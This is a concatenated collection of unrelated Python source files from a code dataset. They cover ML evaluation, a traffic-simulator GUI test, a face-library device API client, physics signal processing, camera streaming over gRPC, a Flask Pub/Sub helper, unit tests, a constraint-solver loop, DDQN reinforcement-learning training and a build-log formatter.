ort_config.save_pretrained(training_args.output_dir)
if training_args.do_eval:
# Prepare the dataset downloading, preprocessing and metric creation to perform the evaluation and / or the
# prediction step(s)
if data_args.train_file is not None or data_args.validation_file is not None:
data_files = {}
if data_args.train_file is not None:
data_files["train"] = data_args.train_file
if data_args.validation_file is not None:
data_files["validation"] = data_args.validation_file
extension = data_args.train_file.split(".")[-1]
raw_datasets = load_dataset(
extension,
data_files=data_files,
cache_dir=model_args.cache_dir,
use_auth_token=True if model_args.use_auth_token else None,
)
else:
# Downloading and loading the swag dataset from the hub.
raw_datasets = load_dataset(
"swag",
"regular",
cache_dir=model_args.cache_dir,
use_auth_token=True if model_args.use_auth_token else None,
)
if "validation" not in raw_datasets:
raise ValueError("--do_eval requires a validation dataset")
eval_dataset = raw_datasets["validation"]
if data_args.max_eval_samples is not None:
max_eval_samples = min(len(eval_dataset), data_args.max_eval_samples)
eval_dataset = eval_dataset.select(range(max_eval_samples))
# When using your own dataset or a different dataset from swag, you will probably need to change this.
ending_names = [f"ending{i}" for i in range(4)]
context_name = "sent1"
question_header_name = "sent2"
# Preprocessing the datasets.
def preprocess_function(examples, tokenizer: PreTrainedTokenizerBase):
first_sentences = [[context] * 4 for context in examples[context_name]]
question_headers = examples[question_header_name]
second_sentences = [
[f"{header} {examples[end][i]}" for end in ending_names] for i, header in enumerate(question_headers)
]
# Flatten out
first_sentences = list(chain(*first_sentences))
second_sentences = list(chain(*second_sentences))
# Tokenize
tokenized_examples = tokenizer(
first_sentences,
second_sentences,
truncation=True,
max_length=min(data_args.max_seq_length, tokenizer.model_max_length),
padding="max_length",
)
# Un-flatten
return {k: [v[i : i + 4] for i in range(0, len(v), 4)] for k, v in tokenized_examples.items()}
# Preprocess the evaluation dataset
with training_args.main_process_first(desc="Running tokenizer on the validation dataset"):
eval_dataset = eval_dataset.map(
partial(preprocess_function, tokenizer=optimizer.tokenizer),
batched=True,
num_proc=data_args.preprocessing_num_workers,
load_from_cache_file=not data_args.overwrite_cache,
)
# Metric
def compute_metrics(eval_predictions):
predictions, label_ids = eval_predictions
preds = np.argmax(predictions, axis=1)
return {"accuracy": (preds == label_ids).astype(np.float32).mean().item()}
# Evaluation
logger.info("*** Evaluate ***")
ort_model = ORTModel(
optimized_model_path,
optimizer._onnx_config,
execution_provider=optim_args.execution_provider,
compute_metrics=compute_metrics,
label_names=["label"],
)
outputs = ort_model.evaluation_loop(eval_dataset)
# Save evaluation metrics
with open(os.path.join(training_args.output_dir, f"eval_results.json"), "w") as f:
json.dump(outputs.metrics, f, indent=4, sort_keys=True)
def _mp_fn(index):
# For xla_spawn (TPUs)
main()
if __name__ == "__main__":
main()
| StarcoderdataPython |
3369083 | <reponame>iltempe/osmosi<filename>sumo/tests/netedit/bugs/ticket2948/test.sikuli/test.py
#!/usr/bin/env python
"""
@file test.py
@author <NAME>
@date 2016-11-25
@version $Id$
python script used by sikulix for testing netedit
SUMO, Simulation of Urban MObility; see http://sumo.dlr.de/
Copyright (C) 2009-2017 DLR/TS, Germany
This file is part of SUMO.
SUMO is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 3 of the License, or
(at your option) any later version.
"""
# import common functions for netedit tests
import os
import sys
testRoot = os.path.join(os.environ.get('SUMO_HOME', '.'), 'tests')
neteditTestRoot = os.path.join(
os.environ.get('TEXTTEST_HOME', testRoot), 'netedit')
sys.path.append(neteditTestRoot)
import neteditTestFunctions as netedit # noqa
# Open netedit
neteditProcess, match = netedit.setupAndStart(neteditTestRoot, ['--new'])
# Change to create edge mode
netedit.createEdgeMode()
# select two-way mode
netedit.changeTwoWayOption()
# select chain mode
netedit.changeChainOption()
# create a circular road
netedit.leftClick(match, 300, 150)
netedit.leftClick(match, 400, 150)
netedit.leftClick(match, 400, 250)
netedit.leftClick(match, 400, 350)
netedit.leftClick(match, 300, 350)
netedit.leftClick(match, 200, 350)
netedit.leftClick(match, 200, 250)
netedit.cancelEdge()
# go to select mode
netedit.selectMode()
# select all elements using invert operation
netedit.selectionInvert()
# go to inspect mode
netedit.inspectMode()
# inspect set of junctions
netedit.leftClick(match, 400, 150)
# Set all Junctions as traffic lighs
netedit.modifyAttribute(0, "traffic_light")
# inspect set of edges
netedit.leftClick(match, 450, 150)
# change all speed of edges
netedit.modifyAttribute(0, "20")
# rebuild network
netedit.rebuildNetwork()
# Check undo and redo
netedit.undo(match, 8)
netedit.redo(match, 8)
# save newtork
netedit.saveNetwork()
# quit netedit
netedit.quit(neteditProcess)
| StarcoderdataPython |
4986240 | from . import auth
import requests
import json
from types import SimpleNamespace
class FaceDataLib(object):
def fp_library_add(self, faceLibType, name, customInfo, host):
path = host+'/ISAPI/Intelligent/FDLib?format=json'
body = {
'faceLibType': faceLibType,
'name': name,
'customInfo': customInfo
}
response = requests.post(path, data=json.dumps(body), auth=auth)
result = json.loads(json.dumps(response.json()), object_hook=lambda d: SimpleNamespace(**d))
return result
def fp_library_update(self, fdid, faceLibType, name, customInfo, host):
path = f'{host}/ISAPI/Intelligent/FDLib?format=json&FDID={fdid}&faceLibType={faceLibType}'
body = {
"name": "CustomTestLibraryBlackFD",
"customInfo": "test libraryBlackFD"
}
response = requests.put(path, data=json.dumps(body), auth=auth)
result = json.loads(json.dumps(response.json()), object_hook=lambda d: SimpleNamespace(**d))
return result
def fp_library_delete(self, fdid, faceLibType, host):
path = f'{host}/ISAPI/Intelligent/FDLib?format=json&FDID={fdid}&faceLibType={faceLibType}'
response = requests.delete(path, auth=auth)
result = json.loads(json.dumps(response.json()), object_hook=lambda d: SimpleNamespace(**d))
return result
def fp_library_list(self, host):
path = '{host}/ISAPI/Intelligent/FDLib?format=json'
response = requests.get(path, auth=auth)
result = json.loads(json.dumps(response.json()), object_hook=lambda d: SimpleNamespace(**d))
return result
class FaceData(object):
def face_data_add(self, faceLibType, FDID, FPID, name, gender, bornTime, city, faceURL, host1, host2):
path1 = host1+'/ISAPI/Intelligent/FDLib/FaceDataRecord?format=json'
path2 = host2+'/ISAPI/Intelligent/FDLib/FaceDataRecord?format=json'
body = {
"faceLibType": faceLibType,
"FDID": str(FDID),
"FPID": str(FPID),
"name": name,
"gender": gender,
"bornTime": bornTime, #"19940226T000000+0500"
"city": city,
"faceURL": faceURL
}
response = requests.post(path1, data=json.dumps(body), auth=auth)
response2 = requests.post(path2, data=json.dumps(body), auth=auth)
result = json.loads(json.dumps(response.json()), object_hook=lambda d: SimpleNamespace(**d))
return result
def face_data_update(self, faceLibType, FDID, FPID, name, gender, bornTime, city, faceURL, host1, host2):
path1 = f'{host1}/ISAPI/Intelligent/FDLib/FDSearch?format=json&FDID={FDID}&FPID={FPID}&faceLibType={faceLibType}'
path2 = f'{host2}/ISAPI/Intelligent/FDLib/FDSearch?format=json&FDID={FDID}&FPID={FPID}&faceLibType={faceLibType}'
body = {
"name": name,
"gender": gender,
"bornTime": bornTime, #"19940226T000000+0500"
"city": city,
"faceURL": faceURL
}
response = requests.put(path1, data=json.dumps(body), auth=auth)
response2 = requests.put(path2, data=json.dumps(body), auth=auth)
result = json.loads(json.dumps(response.json()), object_hook=lambda d: SimpleNamespace(**d))
return result
def face_data_delete(self, faceLibType, FDID, FPIDList, host):
path = f'{host}/ISAPI/Intelligent/FDLib/FDSearch/Delete?format=json&FDID={FDID}&faceLibType={faceLibType}'
fpidlist = []
for fpid in FPIDList:
fpidlist.append({
'value': fpid
})
body = {
'FPID': fpidlist
}
response = requests.put(path, data=json.dumps(body), auth=auth)
result = json.loads(json.dumps(response.json()), object_hook=lambda d: SimpleNamespace(**d))
return result
def face_data_search(self, faceLibType, FDID, FPID, host):
path = f'{host}/ISAPI/Intelligent/FDLib/FDSearch?format=json'
body = {
"searchResultPosition": 0,
"maxResults": 32,
"faceLibType": f'{faceLibType}',
"FDID": f'{FDID}',
"FPID": f'{FPID}'
}
response = requests.post(path, data=json.dumps(body), auth=auth)
result = json.loads(json.dumps(response.json()), object_hook=lambda d: SimpleNamespace(**d))
return result | StarcoderdataPython |
199418 | # -*- coding: utf-8 -*-
"""
Created on Mon Jun 29 12:59:04 2020
@author: hartwgj
"""
# cth 1mm interferometer code
import scipy.constants
from scipy import fft,ifft
from cthmds import CTHData
import numpy as np
# input the chord
# return the density and time axis
# other possible keywords: numfwin, phase,SAVEintfrm_1mm,eflag, verbose
#def CTHintfrm_1mm(shotnum,chord,debug):
def CTHintfrm_1mm(sawsig,intsig,chord,debug): # use when testing
# --------------------- Define constants ---------------------
pi=scipy.constants.pi
c = scipy.constants.c # [m/s] speed of light, !const.c
me = scipy.constants.m_e # [kg] electron mass, !const.me
ep0 = scipy.constants.epsilon_0 # [C^2/Nm^2] permitivity of free space, !const.eps0
e = scipy.constants.e # [C] fundamental charge, !const.e
# these are system dependent
freq=[244.0E9, 244.0E9, 244.0E9, 280.0E9] # chord frequencies
w0 = 2.0*pi * np.array(freq) # [Hz] nominal frequency of output
lp = 2.0 * 0.25 #[m] closer to the flux surface width in ECRH plasmas
dt=1.0/50E6 # 50MHz digitization rate
sweepfreq=450000 # 450kHz sweep frequency
hanning_width=70000 # window width of hanning window
# define data board and channel pairs
sawtooth_ch=[(5,1),(5,1),(5,1),(6,2)]
data_ch = [(5,2),(5,3),(5,4),(6,3)]
# ------------------------- Get data -------------------------
# if debug: print(' Getting interferometer data...')
# intsig=CTHData('intgis')
# sawsig=CTHData('intsaw')
# sawsig.get_data(server='neil',shotnum=shotnum,board_channel=sawtooth_ch[chord-1])
# intsig.get_data(server='neil',shotnum=shotnum,board_channel=data_ch[chord-1])
if debug:
print('')
print(' data retrieved, starting phase calculation... ')
length=len(intsig.data)
print('data length ',length)
signal_strength=max(intsig.data[0:5000]) - min(intsig.data[0:5000])
print('chord ',chord,' signal strength ' ,signal_strength)
# ; Truncate for efficiency 2^23=8388608 which should speed up calculations
# that would go from 1.55s to 1.68 which is not long enough
#
# ;intfrm1 = temporary(intfrm1[0:numt-1])
# ;intfrm2 = temporary(intfrm2[0:numt-1])
# ;intfrm3 = temporary(intfrm3[0:numt-1])
# ;sawtooth = temporary(sawtooth[0:numt-1])
# ;t_intfrm = temporary(t_intfrm[0:numt-1])
# ; experimental code, not in use.
# if 0 then begin
# tdisrupt = 1.66
# ntdisrupt = max(where(t_intfrm le tdisrupt))
# print,ntdisrupt
# nt = 5500000
# numt = long(2)^22
# intfrm = intfrm[0:nt-1,*]
# sawtooth = temporary(sawtooth[0:nt-1])
# t_intfrm = temporary(t_intfrm[0:nt-1])
# ;if ntdisrupt le numt then stop
# ; intfrm = intfrm[ntdisrupt-numt+1:ntdisrupt,*]
# ; sawtooth = temporary(sawtooth[ntdisrupt-numt+1:ntdisrupt])
# ; t_intfrm = temporary(t_intfrm[ntdisrupt-numt+1:ntdisrupt])
# endif
# Compute fft of signals
numt=len(sawsig.data)
sawfft = np.fft.fft(sawsig.data)
# faxis = [findgen(numt/2+1),-reverse(findgen(round(numt/2.0)-1)+1)] /(numt*dt)
faxis=np.linspace(0.0,1.0/(2.0*dt),length//2)
nfmax=int(sweepfreq/5.0)
numfwin=int(hanning_width/5.0)
abssawfft=np.abs(sawfft)
maxsfft=np.max(abssawfft[1:length//2])
nfmax = np.where(abssawfft==maxsfft)[0][0]
if debug: print('nfmax = ',nfmax,' at f= ',faxis[nfmax])
# nfmax=90000
# ; numfwin sets the frequency window width used
# ; I'm not sure what the optimal value is, and it probably depends on the
# ; interferometer chirp frequency (i.e. sawtooth frequency)
numfwin=hanning_width//5
# ; Apply frequency window. Set usehanning = 1 to use a hanning window,
# ; otherwise a top hat window will be used
# usehanning=1
# if keyword_set(usehanning) then begin
# hwin = hanning(2L*numfwin+1)
# for ii=0,numchord-1 do begin
# sigfft[nfmax-numfwin:nfmax+numfwin,ii] = hwin*sigfft[nfmax-numfwin:nfmax+numfwin,ii]
# endfor
# sigfft[0:nfmax-numfwin-1,*] = 0.0
# sigfft[nfmax+numfwin+1:*,*] = 0.0
# endif else begin
# ; Zero out all but frequencies within numfwin of nfmax
# sigfft[0:nfmax-numfwin,*] = 0.0
# sigfft[nfmax+numfwin:*,*] = 0.0
# endelse
# ; Do inverse transform for all chords
# sig = fft(sigfft,/inverse,dimension=1)
# ; Create cleaner reference signal from fft of sawtooth
# reffft = sawfft
# if keyword_set(usehanning) then begin
# hwin = hanning(2L*numfwin+1)
# reffft[nfmax-numfwin:nfmax+numfwin] = hwin*reffft[nfmax-numfwin:nfmax+numfwin]
# reffft[0:nfmax-numfwin-1,*] = 0.0
# reffft[nfmax+numfwin+1:*,*] = 0.0
# endif else begin
# reffft[0:nfmax-numfwin] = 0.0
# reffft[nfmax+numfwin:*] = 0.0
# endelse
# for ii=0,numchord-1 do begin
# if ii eq 0 then ref = fft(reffft,/inverse) else $
# ref = [[ref],[ref]]
# endfor
# ; Calculate phase difference between signals and reference
# phs = atan(sig*conj(ref),/phase)
# ; --------------------- Correct phase -------------------------
# phs = cthfringecounter(phs)
# ; Subtract offset and thin the data
# noffset = where( (t_intfrm ge 1.56) and (t_intfrm le 1.58) )
# for ii=0,numchord-1 do begin
# if ii eq 0 then phase = thinn(phs[*,ii] - mean(phs[noffset,ii]),9) else $
# phase = [[phase],[thinn(phs[*,ii] - mean(phs[noffset,ii]),9)]]
# endfor
# t_intfrm = thinn(t_intfrm,9)
# if n_elements(t_intfrm) ne n_elements(phase[*,0]) then $
# message,'processed data and time axis not of same length!'
# ; --------- Calculate density --------
# ;est_density = -(2.0 * !const.me * !const.eps0 * !const.c * w0 * phase) / (!const.e^2.0 * lp)
# est_density = -(2.0 * me * ep0 * c * w0 * phase) / (e^2.0 * lp)
# t0 = t_intfrm[0]
# tf = max(t_intfrm)
# ;dt = (tf - t0)/(numt - 1)
# taxis = t_intfrm
# dt = (tf - t0)/(n_elements(taxis)-1)
# if max(SAVEintfrm_1mm) eq 1 then begin
# print,' Saving data...'
# for ii=0,numchord-1 do begin
# if SAVEintfrm_1mm[ii] eq 1 then $
# mdsput,'processed:intfrm_1mm:phs_'+strtrim(chord[ii],2), $
# 'BUILD_SIGNAL( $,*,build_range($,$,$))',phase[*,ii],t0,tf,dt
# endfor
# mdsput,'processed:intfrm_1mm:t0','$',t0
# mdsput,'processed:intfrm_1mm:dt','$',dt
# endif
# if keyword_set(stp) then begin
# print, 'cthintfrm_1mm.pro stopped for debugging at ', $
# systime(0)
# stop
# endif
# ; end of cthintfrm_1mm
| StarcoderdataPython |
3580149 | from threading import Thread, Lock
import time
import video_streaming_pb2,video_streaming_pb2_grpc
import numpy as np
import cv2
import imutils
class Camera(Thread):
def __init__(self, channel) -> None:
""" init thread and connect to chrys edge proxy grpc server """
Thread.__init__(self)
self.grpc_stub = video_streaming_pb2_grpc.ImageStub(channel)
self.cameras_frame = {} # current frame from specific camera stored
def gen_image_request(self, device_name, keyframe_only=False) -> video_streaming_pb2.VideoFrameRequest:
""" Create an object to request a video frame """
req = video_streaming_pb2.VideoFrameRequest()
req.device_id = device_name
req.key_frame_only = keyframe_only
return req
def gen_list_stream_request(self):
""" Create a list of streams request object """
stream_request = video_streaming_pb2.ListStreamRequest()
responses = self.grpc_stub.ListStreams(stream_request)
for stream_resp in responses:
yield stream_resp
def get_frame(self, camera_name):
""" Store the latest frame from specific camera into a dictionary """
if camera_name in self.cameras_frame:
jpg = self.cameras_frame[camera_name]
return jpg
return None
def get_camera_list(self):
return list(self.cameras_frame.keys())
def run(self):
""" use grpc_stub to continously request frames """
cam_list_request = self.gen_list_stream_request()
for cam in cam_list_request:
cam_name = cam.name
self.cameras_frame[cam_name] = None
print("found camera: ---> ", cam)
while True:
for cam_name in list(self.cameras_frame.keys()):
try:
req = self.gen_image_request(device_name=cam_name,keyframe_only=True)
frame = self.grpc_stub.VideoLatestImage(req)
if frame:
# read raw frame data and convert to numpy array
img_bytes = frame.data
re_img = np.frombuffer(img_bytes, dtype=np.uint8)
# reshape image back into original dimensions
if len(frame.shape.dim) > 0:
reshape = tuple([int(dim.size) for dim in frame.shape.dim])
re_img = np.reshape(re_img, reshape)
re_img = imutils.resize(re_img, width=960)
tmp=cv2.imencode('.jpg',re_img) #this returns a tuple.
jpg_frame=tmp[1].tobytes() #bytes containing compressed JPEG image
self.cameras_frame[cam_name] = jpg_frame
print("current frame added to ", cam_name, frame.dts, len(jpg_frame))
jpg_frame = None
except Exception as ex:
print(ex)
time.sleep(1)
| StarcoderdataPython |
6409603 | <gh_stars>1000+
"""
Testing qmc5883 python driver
The below i2c configuration is needed in your board.json.
"qmc5883": {
"type": "I2C",
"port": 1,
"addrWidth": 7,
"freq": 400000,
"mode": "master",
"devAddr": 13
}
"""
from qmc5883 import QMC5883
print("Testing qmc5883 ...")
qmc5883Dev = QMC5883()
qmc5883Dev.open("qmc5883")
qmc5883Dev.init()
print("qmc5883 init finished")
heading = qmc5883Dev.qmc5883l_readHeading()
print("heading = %f\n" %heading)
heading = qmc5883Dev.qmc5883l_readHeading()
print("heading = %f\n" %heading)
heading = qmc5883Dev.qmc5883l_readHeading()
print("heading = %f\n" %heading)
heading = qmc5883Dev.qmc5883l_readHeading()
print("heading = %f\n" %heading)
qmc5883Dev.close()
print("Test qmc5883 success!")
| StarcoderdataPython |
1862457 | #
# Flask-PubSub
#
# Copyright (C) 2017 <NAME>
# All rights reserved
#
import base64
import json
import logging
import warnings
from flask import Blueprint, Response, abort, request
from flask.signals import Namespace
from six.moves.http_client import BAD_REQUEST, OK
logger = logging.getLogger('Flask-PubSub')
pubsub_message = Namespace().signal('pubsub.message')
class PubSub(object):
"""
Flask-PubSub
Documentation:
https://flask-pubsub.readthedocs.io
Google Cloud Pub/Sub Documentation:
https://cloud.google.com/pubsub/docs
:param app: Flask app to initialize with. Defaults to `None`
"""
client = None
redis = None
verification_token = None
codec = None
def __init__(self, app=None, blueprint=None, client=None, redis=None, codec=None):
if app is not None:
self.init_app(app, blueprint, client, redis, codec)
def init_app(self, app, blueprint=None, client=None, redis=None, codec=None):
blueprint = blueprint or Blueprint('pubsub', __name__)
blueprint.add_url_rule('/pubsub', 'pubsub', self.handle_push, methods=('POST',))
self.client = client
self.redis = redis
self.verification_token = token = app.config.get('PUBSUB_VERIFICATION_TOKEN')
if token is None:
warnings.warn('PUBSUB_VERIFICATION_TOKEN not set', RuntimeWarning, stacklevel=2)
self.codec = codec or json
def publish(self, topic, message, **kwargs):
self.client.publish(topic, self.codec.dumps(message), **kwargs)
def handle_push(self):
if request.args.get('token') != self.verification_token:
abort(BAD_REQUEST)
payload = json.loads(request.data.decode('utf-8'))
logger.debug('payload=%s', payload)
message = self.codec.loads(base64.b64decode(payload['message']['data']))
logger.debug('message=%s', message)
pubsub_message.send(self, message=message)
return Response(status=OK)
# EOF
| StarcoderdataPython |
5131127 | # !/usr/bin/env python
# -*- coding: utf-8 -*-
"""Tests related to crypto utils module"""
import pytest
import pyswitcheo.crypto_utils as cutils
@pytest.mark.parametrize("input_hex, want", [
('0101', True),
('', True),
('0x01', False),
])
def test_is_regex(input_hex, want):
"""Check regex parsing."""
got = cutils.is_hex(input_hex)
assert want == got, "Expected {0} but received {1} for input {2}".format(want, got, input_hex)
@pytest.mark.parametrize("input_hex, raises_exception", [
(b'0x11', True),
])
def test_ensure_hex(input_hex, raises_exception):
"""Check regex parsing."""
with pytest.raises(Exception) as excinfo:
cutils.ensure_hex(input_hex)
assert 'Expected a hexstring' in str(excinfo)
@pytest.mark.parametrize("input_hex, want", [
('0101', '0101'),
('010111', '110101'),
('abcdef', 'efcdab'),
])
def test_reverse_hex(input_hex, want):
"""Check regex parsing."""
got = cutils.reverse_hex(input_hex)
assert want == got, "Expected {0} but received {1} for input {2}".format(want, got, input_hex)
def test_num_to_hex_string():
"""Check num_to_hex_string conversion."""
data = [(30, "1e"), (100, "64"), (2, "02"), (1000, "e8")]
for inp, want in data:
got = cutils.num_to_hex_string(inp)
assert want == got, "Expected {0} but received {1} for input {2}".format(want, got, inp)
num = -1
with pytest.raises(Exception) as excinfo:
cutils.num_to_hex_string(num=num, size=1, little_endian=False)
assert 'num should be unsigned' in str(excinfo.value)
size = 0.5
with pytest.raises(Exception) as excinfo:
cutils.num_to_hex_string(num=1, size=size, little_endian=False)
assert 'size must be a whole integer' in str(excinfo.value)
@pytest.mark.parametrize("input_hex, want", [
(30, '1e'),
(100, '64'),
(2, '02'),
(12, '0c'),
(1000, 'fde803'),
(0xff, 'fdff00'),
(100000, 'fea08601'),
(4000000, 'fe00093d'),
])
def test_num_to_var_int(input_hex, want):
"""Check regex parsing."""
got = cutils.num_to_var_int(input_hex)
assert want == got, "Expected {0} but received {1} for input {2}".format(want, got, input_hex)
| StarcoderdataPython |
3456834 | import big_csp
optimal = 0
while True:
encoder = big_csp.Encoder(bits=32)
x0 = big_csp.Entity(encoder)
x1 = big_csp.Entity(encoder)
x2 = big_csp.Entity(encoder)
x3 = big_csp.Entity(encoder)
x4 = big_csp.Entity(encoder)
x5 = big_csp.Entity(encoder)
x6 = big_csp.Entity(encoder)
x7 = big_csp.Entity(encoder)
x8 = big_csp.Entity(encoder)
x9 = big_csp.Entity(encoder)
x10 = big_csp.Entity(encoder)
x11 = big_csp.Entity(encoder)
x12 = big_csp.Entity(encoder)
x13 = big_csp.Entity(encoder)
x14 = big_csp.Entity(encoder)
x15 = big_csp.Entity(encoder)
x16 = big_csp.Entity(encoder)
x17 = big_csp.Entity(encoder)
x18 = big_csp.Entity(encoder)
x19 = big_csp.Entity(encoder)
x20 = big_csp.Entity(encoder)
x21 = big_csp.Entity(encoder)
x22 = big_csp.Entity(encoder)
x23 = big_csp.Entity(encoder)
x24 = big_csp.Entity(encoder)
x25 = big_csp.Entity(encoder)
x26 = big_csp.Entity(encoder)
x27 = big_csp.Entity(encoder)
big_csp.Constraint(2 <= x0 <= 7)
big_csp.Constraint(1 <= x1 <= 16)
big_csp.Constraint(1 <= x2 <= 62)
big_csp.Constraint(1 <= x3 <= 50)
big_csp.Constraint(2 <= x4 <= 62)
big_csp.Constraint(2 <= x5 <= 84)
big_csp.Constraint(2 <= x6 <= 55)
big_csp.Constraint(2 <= x7 <= 74)
big_csp.Constraint(0 <= x8 <= 90)
big_csp.Constraint(0 <= x9 <= 15)
big_csp.Constraint(0 <= x10 <= 45)
big_csp.Constraint(1 <= x11 <= 6)
big_csp.Constraint(2 <= x12 <= 30)
big_csp.Constraint(1 <= x13 <= 11)
big_csp.Constraint(0 <= x14 <= 51)
big_csp.Constraint(2 <= x15 <= 72)
big_csp.Constraint(0 <= x16 <= 63)
big_csp.Constraint(1 <= x17 <= 72)
big_csp.Constraint(1 <= x18 <= 83)
big_csp.Constraint(0 <= x19 <= 86)
big_csp.Constraint(1 <= x20 <= 30)
big_csp.Constraint(2 <= x21 <= 85)
big_csp.Constraint(2 <= x22 <= 90)
big_csp.Constraint(0 <= x23 <= 70)
big_csp.Constraint(1 <= x24 <= 35)
big_csp.Constraint(1 <= x25 <= 21)
big_csp.Constraint(1 <= x26 <= 36)
big_csp.Constraint(1 <= x27 <= 4)
big_csp.Constraint(optimal < x20 + x4 * 6 * x4 + x22 * x11 + 6 * x1 + x17 + x25 * 2 * x0 + x0 + x25 * 2 * x13 + x14 * x19 + x5 ** 3 + x16 + x16 * x19 ** 6 + x5 * x19 + 4 * x1 + x6 * x5 + 4 * x24 + x7 * x9 + x27 ** 3 + x22 + x23 * 2 * x18 + x20 + x24 * 2 * x5 + x3 * x13 + x2 ** 6 + x8 + x4 * 5 * x21 + x9 + x12 * 3 * x1)
big_csp.Constraint(x8 * x26 + 3 * x12 + x5 * x8 + x16 ** 5 + x20 + x10 * 3 * x5 + x11 * x7 + 2 * x15 + x22 * x25 + 7 * x23 + x12 * x22 + 7 * x20 + x6 + x13 * x23 ** 7 <= 722)
big_csp.Constraint(x13 * x0 + x24 ** 5 + x1 * x27 + x8 ** 2 + x17 * x7 + 4 * x7 + x18 + x2 * x2 ** 5 + x18 + x8 * x25 ** 2 + x20 + x14 * 4 * x2 + x9 + x24 * x2 ** 7 <= 392)
big_csp.Constraint(x10 * x15 + x22 ** 2 + x0 * x3 + 3 * x22 + x13 + x19 * x19 ** 2 + x10 + x7 * x7 ** 6 + x1 * x16 + 7 * x10 + x14 * x8 + x27 ** 7 + x1 * x4 + 3 * x9 <= 655)
big_csp.Constraint(x12 + x24 * 2 * x2 + x9 + x19 * x11 ** 7 + x16 + x17 * 2 * x10 + x6 + x19 * 3 * x3 + x16 + x1 * x17 ** 5 + x2 + x25 * 3 * x24 + x10 * x26 + 7 * x11 <= 630)
big_csp.Constraint(x5 * x27 + x16 ** 6 + x15 + x25 * x2 ** 6 + x20 + x0 * x10 ** 3 + x14 + x14 * 3 * x3 + x22 + x21 * 3 * x10 + x17 + x14 * x1 ** 4 + x11 * x24 + x1 ** 6 <= 245)
big_csp.Constraint(x1 + x13 * x26 ** 5 + x18 + x27 * 4 * x7 + x1 * x7 + x14 ** 5 + x3 * x13 + 6 * x15 + x1 * x27 + 5 * x6 + x3 * x2 + x24 ** 2 + x17 + x9 * x18 ** 6 <= 764)
big_csp.Constraint(x18 * x27 + 7 * x2 + x9 + x9 * 7 * x10 + x15 + x17 * 7 * x17 + x17 * x9 + x23 ** 7 + x17 + x24 * x10 ** 4 + x11 * x16 + 5 * x2 + x7 + x27 * 6 * x19 <= 581)
solver = big_csp.Solver()
if solver.satisfy([x0, x1, x2, x3, x4, x5, x6, x7, x8, x9, x10, x11, x12, x13, x14, x15, x16, x17, x18, x19, x20, x21, x22, x23, x24, x25, x26, x27]):
optimal = x20 + x4 * 6 * x4 + x22 * x11 + 6 * x1 + x17 + x25 * 2 * x0 + x0 + x25 * 2 * x13 + x14 * x19 + x5 ** 3 + x16 + x16 * x19 ** 6 + x5 * x19 + 4 * x1 + x6 * x5 + 4 * x24 + x7 * x9 + x27 ** 3 + x22 + x23 * 2 * x18 + x20 + x24 * 2 * x5 + x3 * x13 + x2 ** 6 + x8 + x4 * 5 * x21 + x9 + x12 * 3 * x1
print(optimal, '=>', x0, x1, x2, x3, x4, x5, x6, x7, x8, x9, x10, x11, x12, x13, x14, x15, x16, x17, x18, x19, x20, x21, x22, x23, x24, x25, x26, x27)
else:
break
solver.clear()
| StarcoderdataPython |
4871726 | from .supervised import (plot, plot_classification_categorical,
plot_regression_categorical,
plot_classification_continuous,
plot_regression_continuous,
class_hists)
from .utils import (find_pretty_grid, mosaic_plot, discrete_scatter,
plot_coefficients)
__all__ = [
'class_hists', 'discrete_scatter',
'find_pretty_grid', 'mosaic_plot', 'plot',
'plot_classification_categorical', 'plot_classification_continuous',
'plot_regression_categorical', 'plot_regression_continuous',
'plot_coefficients']
| StarcoderdataPython |
12808923 | import sys
import os
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
import argparse
import torch
import numpy as np
from algos.ddqn import DDQN_Agent
from common.buffers import ReplayBuffer
from common.networks import ConvAtariQsNet
from utils import train_tools
from utils.atari_wrappers import make_atari_env
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='DDQN algorithm in atari environment')
parser.add_argument('--env', type=str, default='PongNoFrameskip-v4',
help='the name of environment')
parser.add_argument('--capacity', type=int, default=100000,
help='the max size of data buffer')
parser.add_argument('--batch_size', type=int, default=32,
help='the size of batch that sampled from buffer')
parser.add_argument('--explore_step', type=int, default=20000,
help='the steps of exploration before train')
parser.add_argument('--eval_freq', type=int, default=10000,
help='how often (time steps) we evaluate during training, and it will not eval if eval_freq < 0')
parser.add_argument('--max_train_step', type=int, default=2000000,
help='the max train step')
parser.add_argument('--log_interval', type=int, default=1000,
help='The number of steps taken to record the model and the tensorboard')
parser.add_argument('--resume', action='store_true', default=False,
help='whether load the last saved model to train')
parser.add_argument('--train_id', type=str, default='ddqn_atari_test',
help='Path to save model and log tensorboard')
parser.add_argument('--device', type=str, default='cpu',
help='Choose cpu or cuda')
parser.add_argument('--show', action='store_true', default=False,
help='show the trained model visually')
parser.add_argument('--seed', type=int, default=10,
help='the random seed')
parser.add_argument('--scale_obs', action='store_true', default=False,
help='whether scale the obs to 0-1')
args = parser.parse_args()
torch.manual_seed(args.seed)
np.random.seed(args.seed)
env = make_atari_env(args.env, scale_obs=args.scale_obs)
env.seed(args.seed)
obs_dim = env.observation_space.shape
act_dim = env.action_space.n
Q_net = ConvAtariQsNet(num_frames_stack=4, act_dim=act_dim)
# create buffer
if args.show:
replay_buffer = None
else:
replay_buffer = ReplayBuffer(obs_dim=obs_dim, act_dim=1,
capacity=args.capacity, batch_size=args.batch_size)
agent = DDQN_Agent(env=env,
replay_buffer=replay_buffer,
Q_net=Q_net,
qf_lr=1e-4,
gamma=0.99,
initial_eps=0.1,
end_eps=0.001,
eps_decay_period=1000000,
eval_eps=0.001,
target_update_freq=1000,
train_interval=1,
explore_step=args.explore_step,
eval_freq=args.eval_freq,
max_train_step=args.max_train_step,
train_id=args.train_id,
log_interval=args.log_interval,
resume=args.resume,
device=args.device
)
if args.show:
train_tools.evaluate(agent, 10, show=True)
else:
agent.learn()
| StarcoderdataPython |
6532171 | #!/usr/bin/python
import os, sys
import prettyformat
import fileinput
action = sys.argv[1]
module = sys.argv[2]
line = sys.stdin.readline()
while(line):
valid = True
if("Compiling " in line):
action = "CC"
elif("Linking " in line):
action = "LN"
elif("checking " in line):
action = "CHECK"
elif("Building " in line):
action = "BUILD"
elif("Using FLAGS" in line):
valid = False
elif(line.startswith("rm")):
line = line.split("rm")[1]
while(line.strip().endswith("\\")):
rm_splits = line.strip().split(" ")
if(len(rm_splits) == 0):
break
if(rm_splits[0].startswith("-")):
rm_splits = rm_splits[1:]
for item in rm_splits:
if(item.strip() != "" and item.strip() != "\\"):
prettyformat.pretty("RM", module, item.strip(), False)
line = sys.stdin.readline()
